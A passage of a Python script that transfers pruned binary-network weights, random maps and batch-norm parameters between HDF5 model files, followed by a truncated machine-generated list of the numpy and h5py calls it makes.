rand_map_1_expand = np.reshape(rand_map_1_expand, [-1,1]).astype(float)
pret_rand_map_exp_1[...] = rand_map_1_expand
rand_map_2_expand = np.reshape(rand_map_2_expand, [-1,1]).astype(float)
pret_rand_map_exp_2[...] = rand_map_2_expand
print(np.sum(np.array(bl_pruning_mask)), np.prod(np.shape(np.array(bl_pruning_mask))))
# dense layer 5
bl_w1 = bl["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_1:0"]
bl_rand_map_0 = bl["model_weights"]["binary_dense_5"]["binary_dense_5"]["rand_map_0:0"]
bl_pruning_mask = bl["model_weights"]["binary_dense_5"]["binary_dense_5"]["pruning_mask:0"]
bl_gamma = bl["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable:0"]
bl_means = bl["model_weights"]["residual_sign_4"]["residual_sign_4"]["means:0"]
pret_rand_map_0 = pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["rand_map_0:0"]
pret_rand_map_1 = pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["rand_map_1:0"]
pret_rand_map_2 = pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["rand_map_2:0"]
pret_pruning_mask = pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["pruning_mask:0"]
p_gamma = pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable:0"]
pret_means = pretrained["model_weights"]["residual_sign_4"]["residual_sign_4"]["means:0"]
pret_c1 = pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_1:0"]
pret_c2 = pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_2:0"]
pret_c3 = pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_3:0"]
pret_c4 = pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_4:0"]
pret_c5 = pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_5:0"]
pret_c6 = pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_6:0"]
pret_c7 = pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_7:0"]
pret_c8 = pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_8:0"]
pret_c9 = pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_9:0"]
pret_c10= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_10:0"]
pret_c11= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_11:0"]
pret_c12= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_12:0"]
pret_c13= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_13:0"]
pret_c14= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_14:0"]
pret_c15= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_15:0"]
pret_c16= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_16:0"]
pret_c17= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_17:0"]
pret_c18= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_18:0"]
pret_c19= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_19:0"]
pret_c20= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_20:0"]
pret_c21= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_21:0"]
pret_c22= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_22:0"]
pret_c23= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_23:0"]
pret_c24= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_24:0"]
pret_c25= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_25:0"]
pret_c26= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_26:0"]
pret_c27= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_27:0"]
pret_c28= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_28:0"]
pret_c29= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_29:0"]
pret_c30= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_30:0"]
pret_c31= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_31:0"]
pret_c32= pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_32:0"]
pret_w1 = pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["Variable_33:0"]
pret_rand_map_exp_0 = pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["rand_map_exp_0:0"]
pret_rand_map_exp_1 = pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["rand_map_exp_1:0"]
pret_rand_map_exp_2 = pretrained["model_weights"]["binary_dense_5"]["binary_dense_5"]["rand_map_exp_2:0"]
weight_shape = np.shape(bl_w1)
tile_shape = np.shape(pret_c1)
zero_fill = np.zeros(tile_shape)
one_fill = np.ones(tile_shape)
neg_one_fill = -np.ones(tile_shape)
# randomisation and pruning recovery
bl_w1_unroll = np.array(bl_w1)
bl_w1 = np.array(bl_w1)
rand_map_0 = np.arange(tile_shape[0])
np.random.shuffle(rand_map_0)
rand_map_1 = np.arange(tile_shape[0])
np.random.shuffle(rand_map_1)
rand_map_2 = np.arange(tile_shape[0])
np.random.shuffle(rand_map_2)
pruning_mask = np.array(bl_pruning_mask).astype(bool)
init_mask = np.logical_not(pruning_mask[rand_map_0])
pruning_mask_recover = np.logical_and(pruning_mask, init_mask)[np.argsort(rand_map_0)]
pruning_mask = np.logical_or(pruning_mask, pruning_mask_recover)
init_mask = np.reshape(init_mask, tile_shape)
# expand randomisation map across tiles
rand_map_0_expand = np.tile(rand_map_0,[weight_shape[0]/tile_shape[0]])
rand_map_1_expand = np.tile(rand_map_1,[weight_shape[0]/tile_shape[0]])
rand_map_2_expand = np.tile(rand_map_2,[weight_shape[0]/tile_shape[0]])
for i in range(weight_shape[0]):
rand_map_0_expand[i] = rand_map_0_expand[i] + (tile_shape[0]*(weight_shape[0]/tile_shape[0]-1)) * (rand_map_0_expand[i]/tile_shape[0]) + tile_shape[0]*(i%weight_shape[0]/tile_shape[0])
rand_map_1_expand[i] = rand_map_1_expand[i] + (tile_shape[0]*(weight_shape[0]/tile_shape[0]-1)) * (rand_map_1_expand[i]/tile_shape[0]) + tile_shape[0]*(i%weight_shape[0]/tile_shape[0])
rand_map_2_expand[i] = rand_map_2_expand[i] + (tile_shape[0]*(weight_shape[0]/tile_shape[0]-1)) * (rand_map_2_expand[i]/tile_shape[0]) + tile_shape[0]*(i%weight_shape[0]/tile_shape[0])
bl_w1_rand_0 = bl_w1_unroll[rand_map_0_expand]
bl_w1_rand_0 = np.reshape(bl_w1_rand_0, weight_shape)
w1 = bl_w1
# connect1 only
c1 = one_fill
c2 = neg_one_fill
c3 = one_fill
c4 = neg_one_fill
c5 = one_fill
c6 = neg_one_fill
c7 = one_fill
c8 = neg_one_fill
c9 = one_fill
c10 = neg_one_fill
c11 = one_fill
c12 = neg_one_fill
c13 = one_fill
c14 = neg_one_fill
c15 = one_fill
c16 = neg_one_fill
c17 = neg_one_fill
c18 = one_fill
c19 = neg_one_fill
c20 = one_fill
c21 = neg_one_fill
c22 = one_fill
c23 = neg_one_fill
c24 = one_fill
c25 = neg_one_fill
c26 = one_fill
c27 = neg_one_fill
c28 = one_fill
c29 = neg_one_fill
c30 = one_fill
c31 = neg_one_fill
c32 = one_fill
pret_w1 [...] = w1
pret_c1 [...] = c1
pret_c2 [...] = c2
pret_c3 [...] = c3
pret_c4 [...] = c4
pret_c5 [...] = c5
pret_c6 [...] = c6
pret_c7 [...] = c7
pret_c8 [...] = c8
pret_c9 [...] = c9
pret_c10[...] = c10
pret_c11[...] = c11
pret_c12[...] = c12
pret_c13[...] = c13
pret_c14[...] = c14
pret_c15[...] = c15
pret_c16[...] = c16
pret_c17[...] = c17
pret_c18[...] = c18
pret_c19[...] = c19
pret_c20[...] = c20
pret_c21[...] = c21
pret_c22[...] = c22
pret_c23[...] = c23
pret_c24[...] = c24
pret_c25[...] = c25
pret_c26[...] = c26
pret_c27[...] = c27
pret_c28[...] = c28
pret_c29[...] = c29
pret_c30[...] = c30
pret_c31[...] = c31
pret_c32[...] = c32
pret_rand_map_0[...] = np.reshape(rand_map_0, (-1,1)).astype(float)
pret_rand_map_1[...] = np.reshape(rand_map_1, (-1,1)).astype(float)
pret_rand_map_2[...] = np.reshape(rand_map_2, (-1,1)).astype(float)
p_gamma[...] = np.array(bl_gamma)
pret_means[...] = np.array(bl_means)
pret_pruning_mask[...] = np.array(bl_pruning_mask)
rand_map_0_expand = np.reshape(rand_map_0_expand, [-1,1]).astype(float)
pret_rand_map_exp_0[...] = rand_map_0_expand
rand_map_1_expand = np.reshape(rand_map_1_expand, [-1,1]).astype(float)
pret_rand_map_exp_1[...] = rand_map_1_expand
rand_map_2_expand = np.reshape(rand_map_2_expand, [-1,1]).astype(float)
pret_rand_map_exp_2[...] = rand_map_2_expand
print(np.sum(np.array(bl_pruning_mask)), np.prod(np.shape(np.array(bl_pruning_mask))))
# bn 1
bl_beta = bl["model_weights"]["batch_normalization_1"]["batch_normalization_1"]["beta:0"]
bl_gamma = bl["model_weights"]["batch_normalization_1"]["batch_normalization_1"]["gamma:0"]
bl_moving_mean = bl["model_weights"]["batch_normalization_1"]["batch_normalization_1"]["moving_mean:0"]
bl_moving_variance = bl["model_weights"]["batch_normalization_1"]["batch_normalization_1"]["moving_variance:0"]
p_beta = pretrained["model_weights"]["batch_normalization_1"]["batch_normalization_1"]["beta:0"]
p_gamma = pretrained["model_weights"]["batch_normalization_1"]["batch_normalization_1"]["gamma:0"]
p_moving_mean = pretrained["model_weights"]["batch_normalization_1"]["batch_normalization_1"]["moving_mean:0"]
p_moving_variance = pretrained["model_weights"]["batch_normalization_1"]["batch_normalization_1"]["moving_variance:0"]
p_beta[...] = np.array(bl_beta)
p_gamma[...] = np.array(bl_gamma)
p_moving_mean[...] = np.array(bl_moving_mean)
p_moving_variance[...] = np.array(bl_moving_variance)
# bn 2
bl_beta = bl["model_weights"]["batch_normalization_2"]["batch_normalization_2"]["beta:0"]
bl_gamma = bl["model_weights"]["batch_normalization_2"]["batch_normalization_2"]["gamma:0"]
bl_moving_mean = bl["model_weights"]["batch_normalization_2"]["batch_normalization_2"]["moving_mean:0"]
bl_moving_variance = bl["model_weights"]["batch_normalization_2"]["batch_normalization_2"]["moving_variance:0"]
p_beta = pretrained["model_weights"]["batch_normalization_2"]["batch_normalization_2"]["beta:0"]
p_gamma = pretrained["model_weights"]["batch_normalization_2"]["batch_normalization_2"]["gamma:0"]
p_moving_mean = pretrained["model_weights"]["batch_normalization_2"]["batch_normalization_2"]["moving_mean:0"]
p_moving_variance = pretrained["model_weights"]["batch_normalization_2"]["batch_normalization_2"]["moving_variance:0"]
p_beta[...] = np.array(bl_beta)
p_gamma[...] = np.array(bl_gamma)
p_moving_mean[...] = np.array(bl_moving_mean)
p_moving_variance[...] = np.array(bl_moving_variance)
# bn 3
bl_beta = bl["model_weights"]["batch_normalization_3"]["batch_normalization_3"]["beta:0"]
bl_gamma = bl["model_weights"]["batch_normalization_3"]["batch_normalization_3"]["gamma:0"]
bl_moving_mean = bl["model_weights"]["batch_normalization_3"]["batch_normalization_3"]["moving_mean:0"]
bl_moving_variance = bl["model_weights"]["batch_normalization_3"]["batch_normalization_3"]["moving_variance:0"]
p_beta = pretrained["model_weights"]["batch_normalization_3"]["batch_normalization_3"]["beta:0"]
p_gamma = pretrained["model_weights"]["batch_normalization_3"]["batch_normalization_3"]["gamma:0"]
p_moving_mean = pretrained["model_weights"]["batch_normalization_3"]["batch_normalization_3"]["moving_mean:0"]
p_moving_variance = pretrained["model_weights"]["batch_normalization_3"]["batch_normalization_3"]["moving_variance:0"]
p_beta[...] = np.array(bl_beta)
p_gamma[...] = np.array(bl_gamma)
p_moving_mean[...] = np.array(bl_moving_mean)
p_moving_variance[...] = np.array(bl_moving_variance)
# bn 4
bl_beta = bl["model_weights"]["batch_normalization_4"]["batch_normalization_4"]["beta:0"]
bl_gamma = bl["model_weights"]["batch_normalization_4"]["batch_normalization_4"]["gamma:0"]
bl_moving_mean = bl["model_weights"]["batch_normalization_4"]["batch_normalization_4"]["moving_mean:0"]
bl_moving_variance = bl["model_weights"]["batch_normalization_4"]["batch_normalization_4"]["moving_variance:0"]
p_beta = pretrained["model_weights"]["batch_normalization_4"]["batch_normalization_4"]["beta:0"]
p_gamma = pretrained["model_weights"]["batch_normalization_4"]["batch_normalization_4"]["gamma:0"]
p_moving_mean = pretrained["model_weights"]["batch_normalization_4"]["batch_normalization_4"]["moving_mean:0"]
p_moving_variance = pretrained["model_weights"]["batch_normalization_4"]["batch_normalization_4"]["moving_variance:0"]
p_beta[...] = np.array(bl_beta)
p_gamma[...] = np.array(bl_gamma)
p_moving_mean[...] = np.array(bl_moving_mean)
p_moving_variance[...] = np.array(bl_moving_variance)
# bn 5
bl_beta = bl["model_weights"]["batch_normalization_5"]["batch_normalization_5"]["beta:0"]
bl_gamma = bl["model_weights"]["batch_normalization_5"]["batch_normalization_5"]["gamma:0"]
bl_moving_mean = bl["model_weights"]["batch_normalization_5"]["batch_normalization_5"]["moving_mean:0"]
bl_moving_variance = bl["model_weights"]["batch_normalization_5"]["batch_normalization_5"]["moving_variance:0"]
p_beta = pretrained["model_weights"]["batch_normalization_5"]["batch_normalization_5"]["beta:0"]
p_gamma = pretrained["model_weights"]["batch_normalization_5"]["batch_normalization_5"]["gamma:0"]
p_moving_mean = pretrained["model_weights"]["batch_normalization_5"]["batch_normalization_5"]["moving_mean:0"]
p_moving_variance = pretrained["model_weights"]["batch_normalization_5"]["batch_normalization_5"]["moving_variance:0"]
p_beta[...] = np.array(bl_beta)
p_gamma[...] = np.array(bl_gamma)
p_moving_mean[...] = np.array(bl_moving_mean)
p_moving_variance[...] = np.array(bl_moving_variance)
pretrained.close()
| [
"numpy.tile",
"numpy.random.shuffle",
"numpy.reshape",
"numpy.ones",
"numpy.logical_and",
"numpy.logical_not",
"numpy.logical_or",
"h5py.File",
"numpy.argsort",
"numpy.array",
"shutil.copyfile",
"numpy.zeros",
"numpy.shape",
"numpy.arange",
"numpy.set_printoptions"
] | [((31, 68), 'numpy.set_printoptions', 'np.set_printoptions', ([], {'threshold': 'np.nan'}), '(threshold=np.nan)\n', (50, 68), True, 'import numpy as np\n'), ((99, 147), 'shutil.copyfile', 'copyfile', (['"""dummy_lutnet.h5"""', '"""pretrained_bin.h5"""'], {}), "('dummy_lutnet.h5', 'pretrained_bin.h5')\n", (107, 147), False, 'from shutil import copyfile\n'), ((211, 247), 'h5py.File', 'h5py.File', (['"""baseline_pruned.h5"""', '"""r"""'], {}), "('baseline_pruned.h5', 'r')\n", (220, 247), False, 'import h5py\n'), ((297, 333), 'h5py.File', 'h5py.File', (['"""pretrained_bin.h5"""', '"""r+"""'], {}), "('pretrained_bin.h5', 'r+')\n", (306, 333), False, 'import h5py\n'), ((949, 964), 'numpy.array', 'np.array', (['bl_w1'], {}), '(bl_w1)\n', (957, 964), True, 'import numpy as np\n'), ((980, 998), 'numpy.array', 'np.array', (['bl_gamma'], {}), '(bl_gamma)\n', (988, 998), True, 'import numpy as np\n'), ((1024, 1049), 'numpy.array', 'np.array', (['bl_pruning_mask'], {}), '(bl_pruning_mask)\n', (1032, 1049), True, 'import numpy as np\n'), ((5514, 5529), 'numpy.shape', 'np.shape', (['bl_w1'], {}), '(bl_w1)\n', (5522, 5529), True, 'import numpy as np\n'), ((5543, 5560), 'numpy.shape', 'np.shape', (['pret_c1'], {}), '(pret_c1)\n', (5551, 5560), True, 'import numpy as np\n'), ((5573, 5593), 'numpy.zeros', 'np.zeros', (['tile_shape'], {}), '(tile_shape)\n', (5581, 5593), True, 'import numpy as np\n'), ((5605, 5624), 'numpy.ones', 'np.ones', (['tile_shape'], {}), '(tile_shape)\n', (5612, 5624), True, 'import numpy as np\n'), ((5714, 5729), 'numpy.array', 'np.array', (['bl_w1'], {}), '(bl_w1)\n', (5722, 5729), True, 'import numpy as np\n'), ((5738, 5753), 'numpy.array', 'np.array', (['bl_w1'], {}), '(bl_w1)\n', (5746, 5753), True, 'import numpy as np\n'), ((5768, 5792), 'numpy.arange', 'np.arange', (['tile_shape[0]'], {}), '(tile_shape[0])\n', (5777, 5792), True, 'import numpy as np\n'), ((5793, 5822), 'numpy.random.shuffle', 'np.random.shuffle', (['rand_map_0'], {}), '(rand_map_0)\n', (5810, 5822), True, 'import numpy as np\n'), ((5836, 5860), 'numpy.arange', 'np.arange', (['tile_shape[0]'], {}), '(tile_shape[0])\n', (5845, 5860), True, 'import numpy as np\n'), ((5861, 5890), 'numpy.random.shuffle', 'np.random.shuffle', (['rand_map_1'], {}), '(rand_map_1)\n', (5878, 5890), True, 'import numpy as np\n'), ((5904, 5928), 'numpy.arange', 'np.arange', (['tile_shape[0]'], {}), '(tile_shape[0])\n', (5913, 5928), True, 'import numpy as np\n'), ((5929, 5958), 'numpy.random.shuffle', 'np.random.shuffle', (['rand_map_2'], {}), '(rand_map_2)\n', (5946, 5958), True, 'import numpy as np\n'), ((6026, 6066), 'numpy.logical_not', 'np.logical_not', (['pruning_mask[rand_map_0]'], {}), '(pruning_mask[rand_map_0])\n', (6040, 6066), True, 'import numpy as np\n'), ((6169, 6218), 'numpy.logical_or', 'np.logical_or', (['pruning_mask', 'pruning_mask_recover'], {}), '(pruning_mask, pruning_mask_recover)\n', (6182, 6218), True, 'import numpy as np\n'), ((6231, 6264), 'numpy.reshape', 'np.reshape', (['init_mask', 'tile_shape'], {}), '(init_mask, tile_shape)\n', (6241, 6264), True, 'import numpy as np\n'), ((6327, 6381), 'numpy.tile', 'np.tile', (['rand_map_0', '[weight_shape[0] / tile_shape[0]]'], {}), '(rand_map_0, [weight_shape[0] / tile_shape[0]])\n', (6334, 6381), True, 'import numpy as np\n'), ((6399, 6453), 'numpy.tile', 'np.tile', (['rand_map_1', '[weight_shape[0] / tile_shape[0]]'], {}), '(rand_map_1, [weight_shape[0] / tile_shape[0]])\n', (6406, 6453), True, 'import numpy as np\n'), ((6471, 6525), 'numpy.tile', 'np.tile', (['rand_map_2', '[weight_shape[0] / tile_shape[0]]'], {}), '(rand_map_2, [weight_shape[0] / tile_shape[0]])\n', (6478, 6525), True, 'import numpy as np\n'), ((7198, 7236), 'numpy.reshape', 'np.reshape', (['bl_w1_rand_0', 'weight_shape'], {}), '(bl_w1_rand_0, weight_shape)\n', (7208, 7236), True, 'import numpy as np\n'), ((8681, 8699), 'numpy.array', 'np.array', (['bl_gamma'], {}), '(bl_gamma)\n', (8689, 8699), True, 'import numpy as np\n'), ((8718, 8736), 'numpy.array', 'np.array', (['bl_means'], {}), '(bl_means)\n', (8726, 8736), True, 'import numpy as np\n'), ((8762, 8787), 'numpy.array', 'np.array', (['bl_pruning_mask'], {}), '(bl_pruning_mask)\n', (8770, 8787), True, 'import numpy as np\n'), ((13604, 13619), 'numpy.shape', 'np.shape', (['bl_w1'], {}), '(bl_w1)\n', (13612, 13619), True, 'import numpy as np\n'), ((13633, 13650), 'numpy.shape', 'np.shape', (['pret_c1'], {}), '(pret_c1)\n', (13641, 13650), True, 'import numpy as np\n'), ((13663, 13683), 'numpy.zeros', 'np.zeros', (['tile_shape'], {}), '(tile_shape)\n', (13671, 13683), True, 'import numpy as np\n'), ((13695, 13714), 'numpy.ones', 'np.ones', (['tile_shape'], {}), '(tile_shape)\n', (13702, 13714), True, 'import numpy as np\n'), ((13804, 13819), 'numpy.array', 'np.array', (['bl_w1'], {}), '(bl_w1)\n', (13812, 13819), True, 'import numpy as np\n'), ((13828, 13843), 'numpy.array', 'np.array', (['bl_w1'], {}), '(bl_w1)\n', (13836, 13843), True, 'import numpy as np\n'), ((13858, 13882), 'numpy.arange', 'np.arange', (['tile_shape[0]'], {}), '(tile_shape[0])\n', (13867, 13882), True, 'import numpy as np\n'), ((13883, 13912), 'numpy.random.shuffle', 'np.random.shuffle', (['rand_map_0'], {}), '(rand_map_0)\n', (13900, 13912), True, 'import numpy as np\n'), ((13926, 13950), 'numpy.arange', 'np.arange', (['tile_shape[0]'], {}), '(tile_shape[0])\n', (13935, 13950), True, 'import numpy as np\n'), ((13951, 13980), 'numpy.random.shuffle', 'np.random.shuffle', (['rand_map_1'], {}), '(rand_map_1)\n', (13968, 13980), True, 'import numpy as np\n'), ((13994, 14018), 'numpy.arange', 'np.arange', (['tile_shape[0]'], {}), '(tile_shape[0])\n', (14003, 14018), True, 'import numpy as np\n'), ((14019, 14048), 'numpy.random.shuffle', 'np.random.shuffle', (['rand_map_2'], {}), '(rand_map_2)\n', (14036, 14048), True, 'import numpy as np\n'), ((14116, 14156), 'numpy.logical_not', 'np.logical_not', (['pruning_mask[rand_map_0]'], {}), '(pruning_mask[rand_map_0])\n', (14130, 14156), True, 'import numpy as np\n'), ((14259, 14308), 'numpy.logical_or', 'np.logical_or', (['pruning_mask', 'pruning_mask_recover'], {}), '(pruning_mask, pruning_mask_recover)\n', (14272, 14308), True, 'import numpy as np\n'), ((14321, 14354), 'numpy.reshape', 'np.reshape', (['init_mask', 'tile_shape'], {}), '(init_mask, tile_shape)\n', (14331, 14354), True, 'import numpy as np\n'), ((14417, 14471), 'numpy.tile', 'np.tile', (['rand_map_0', '[weight_shape[0] / tile_shape[0]]'], {}), '(rand_map_0, [weight_shape[0] / tile_shape[0]])\n', (14424, 14471), True, 'import numpy as np\n'), ((14489, 14543), 'numpy.tile', 'np.tile', (['rand_map_1', '[weight_shape[0] / tile_shape[0]]'], {}), '(rand_map_1, [weight_shape[0] / tile_shape[0]])\n', (14496, 14543), True, 'import numpy as np\n'), ((14561, 14615), 'numpy.tile', 'np.tile', (['rand_map_2', '[weight_shape[0] / tile_shape[0]]'], {}), '(rand_map_2, [weight_shape[0] / tile_shape[0]])\n', (14568, 14615), True, 'import numpy as np\n'), ((15288, 15326), 'numpy.reshape', 'np.reshape', (['bl_w1_rand_0', 'weight_shape'], {}), '(bl_w1_rand_0, weight_shape)\n', (15298, 15326), True, 'import numpy as np\n'), ((16771, 16789), 'numpy.array', 'np.array', (['bl_gamma'], {}), '(bl_gamma)\n', (16779, 16789), True, 'import numpy as np\n'), ((16808, 16826), 'numpy.array', 'np.array', (['bl_means'], {}), '(bl_means)\n', (16816, 16826), True, 'import numpy as np\n'), ((16852, 16877), 'numpy.array', 'np.array', (['bl_pruning_mask'], {}), '(bl_pruning_mask)\n', (16860, 16877), True, 'import numpy as np\n'), ((21694, 21709), 'numpy.shape', 'np.shape', (['bl_w1'], {}), '(bl_w1)\n', (21702, 21709), True, 'import numpy as np\n'), ((21723, 21740), 'numpy.shape', 'np.shape', (['pret_c1'], {}), '(pret_c1)\n', (21731, 21740), True, 'import numpy as np\n'), ((21753, 21773), 'numpy.zeros', 'np.zeros', (['tile_shape'], {}), '(tile_shape)\n', (21761, 21773), True, 'import numpy as np\n'), ((21785, 21804), 'numpy.ones', 'np.ones', (['tile_shape'], {}), '(tile_shape)\n', (21792, 21804), True, 'import numpy as np\n'), ((21894, 21909), 'numpy.array', 'np.array', (['bl_w1'], {}), '(bl_w1)\n', (21902, 21909), True, 'import numpy as np\n'), ((21918, 21933), 'numpy.array', 'np.array', (['bl_w1'], {}), '(bl_w1)\n', (21926, 21933), True, 'import numpy as np\n'), ((21948, 21972), 'numpy.arange', 'np.arange', (['tile_shape[0]'], {}), '(tile_shape[0])\n', (21957, 21972), True, 'import numpy as np\n'), ((21973, 22002), 'numpy.random.shuffle', 'np.random.shuffle', (['rand_map_0'], {}), '(rand_map_0)\n', (21990, 22002), True, 'import numpy as np\n'), ((22016, 22040), 'numpy.arange', 'np.arange', (['tile_shape[0]'], {}), '(tile_shape[0])\n', (22025, 22040), True, 'import numpy as np\n'), ((22041, 22070), 'numpy.random.shuffle', 'np.random.shuffle', (['rand_map_1'], {}), '(rand_map_1)\n', (22058, 22070), True, 'import numpy as np\n'), ((22084, 22108), 'numpy.arange', 'np.arange', (['tile_shape[0]'], {}), '(tile_shape[0])\n', (22093, 22108), True, 'import numpy as np\n'), ((22109, 22138), 'numpy.random.shuffle', 'np.random.shuffle', (['rand_map_2'], {}), '(rand_map_2)\n', (22126, 22138), True, 'import numpy as np\n'), ((22206, 22246), 'numpy.logical_not', 'np.logical_not', (['pruning_mask[rand_map_0]'], {}), '(pruning_mask[rand_map_0])\n', (22220, 22246), True, 'import numpy as np\n'), ((22349, 22398), 'numpy.logical_or', 'np.logical_or', (['pruning_mask', 'pruning_mask_recover'], {}), '(pruning_mask, pruning_mask_recover)\n', (22362, 22398), True, 'import numpy as np\n'), ((22411, 22444), 'numpy.reshape', 'np.reshape', (['init_mask', 'tile_shape'], {}), '(init_mask, tile_shape)\n', (22421, 22444), True, 'import numpy as np\n'), ((22507, 22561), 'numpy.tile', 'np.tile', (['rand_map_0', '[weight_shape[0] / tile_shape[0]]'], {}), '(rand_map_0, [weight_shape[0] / tile_shape[0]])\n', (22514, 22561), True, 'import numpy as np\n'), ((22579, 22633), 'numpy.tile', 'np.tile', (['rand_map_1', '[weight_shape[0] / tile_shape[0]]'], {}), '(rand_map_1, [weight_shape[0] / tile_shape[0]])\n', (22586, 22633), True, 'import numpy as np\n'), ((22651, 22705), 'numpy.tile', 'np.tile', (['rand_map_2', '[weight_shape[0] / tile_shape[0]]'], {}), '(rand_map_2, [weight_shape[0] / tile_shape[0]])\n', (22658, 22705), True, 'import numpy as np\n'), ((23378, 23416), 'numpy.reshape', 'np.reshape', (['bl_w1_rand_0', 'weight_shape'], {}), '(bl_w1_rand_0, weight_shape)\n', (23388, 23416), True, 'import numpy as np\n'), ((24861, 24879), 'numpy.array', 'np.array', (['bl_gamma'], {}), '(bl_gamma)\n', (24869, 24879), True, 'import numpy as np\n'), ((24898, 24916), 'numpy.array', 'np.array', (['bl_means'], {}), '(bl_means)\n', (24906, 24916), True, 'import numpy as np\n'), ((24942, 24967), 'numpy.array', 'np.array', (['bl_pruning_mask'], {}), '(bl_pruning_mask)\n', (24950, 24967), True, 'import numpy as np\n'), ((29784, 29799), 'numpy.shape', 'np.shape', (['bl_w1'], {}), '(bl_w1)\n', (29792, 29799), True, 'import numpy as np\n'), ((29813, 29830), 'numpy.shape', 'np.shape', (['pret_c1'], {}), '(pret_c1)\n', (29821, 29830), True, 'import numpy as np\n'), ((29843, 29863), 'numpy.zeros', 'np.zeros', (['tile_shape'], {}), '(tile_shape)\n', (29851, 29863), True, 'import numpy as np\n'), ((29875, 29894), 'numpy.ones', 'np.ones', (['tile_shape'], {}), '(tile_shape)\n', (29882, 29894), True, 'import numpy as np\n'), ((29984, 29999), 'numpy.array', 'np.array', (['bl_w1'], {}), '(bl_w1)\n', (29992, 29999), True, 'import numpy as np\n'), ((30008, 30023), 'numpy.array', 'np.array', (['bl_w1'], {}), '(bl_w1)\n', (30016, 30023), True, 'import numpy as np\n'), ((30038, 30062), 'numpy.arange', 'np.arange', (['tile_shape[0]'], {}), '(tile_shape[0])\n', (30047, 30062), True, 'import numpy as np\n'), ((30063, 30092), 'numpy.random.shuffle', 'np.random.shuffle', (['rand_map_0'], {}), '(rand_map_0)\n', (30080, 30092), True, 'import numpy as np\n'), ((30106, 30130), 'numpy.arange', 'np.arange', (['tile_shape[0]'], {}), '(tile_shape[0])\n', (30115, 30130), True, 'import numpy as np\n'), ((30131, 30160), 'numpy.random.shuffle', 'np.random.shuffle', (['rand_map_1'], {}), '(rand_map_1)\n', (30148, 30160), True, 'import numpy as np\n'), ((30174, 30198), 'numpy.arange', 'np.arange', (['tile_shape[0]'], {}), '(tile_shape[0])\n', (30183, 30198), True, 'import numpy as np\n'), ((30199, 30228), 'numpy.random.shuffle', 'np.random.shuffle', (['rand_map_2'], {}), '(rand_map_2)\n', (30216, 30228), True, 'import numpy as np\n'), ((30296, 30336), 'numpy.logical_not', 'np.logical_not', (['pruning_mask[rand_map_0]'], {}), '(pruning_mask[rand_map_0])\n', (30310, 30336), True, 'import numpy as np\n'), ((30439, 30488), 'numpy.logical_or', 'np.logical_or', (['pruning_mask', 'pruning_mask_recover'], {}), '(pruning_mask, pruning_mask_recover)\n', (30452, 30488), True, 'import numpy as np\n'), ((30501, 30534), 'numpy.reshape', 'np.reshape', (['init_mask', 'tile_shape'], {}), '(init_mask, tile_shape)\n', (30511, 30534), True, 'import numpy as np\n'), ((30597, 30651), 'numpy.tile', 'np.tile', (['rand_map_0', '[weight_shape[0] / tile_shape[0]]'], {}), '(rand_map_0, [weight_shape[0] / tile_shape[0]])\n', (30604, 30651), True, 'import numpy as np\n'), ((30669, 30723), 'numpy.tile', 'np.tile', (['rand_map_1', '[weight_shape[0] / tile_shape[0]]'], {}), '(rand_map_1, [weight_shape[0] / tile_shape[0]])\n', (30676, 30723), True, 'import numpy as np\n'), ((30741, 30795), 'numpy.tile', 'np.tile', (['rand_map_2', '[weight_shape[0] / tile_shape[0]]'], {}), '(rand_map_2, [weight_shape[0] / tile_shape[0]])\n', (30748, 30795), True, 'import numpy as np\n'), ((31468, 31506), 'numpy.reshape', 'np.reshape', (['bl_w1_rand_0', 'weight_shape'], {}), '(bl_w1_rand_0, weight_shape)\n', (31478, 31506), True, 'import numpy as np\n'), ((32951, 32969), 'numpy.array', 'np.array', (['bl_gamma'], {}), '(bl_gamma)\n', (32959, 32969), True, 'import numpy as np\n'), ((32988, 33006), 'numpy.array', 'np.array', (['bl_means'], {}), '(bl_means)\n', (32996, 33006), True, 'import numpy as np\n'), ((33032, 33057), 'numpy.array', 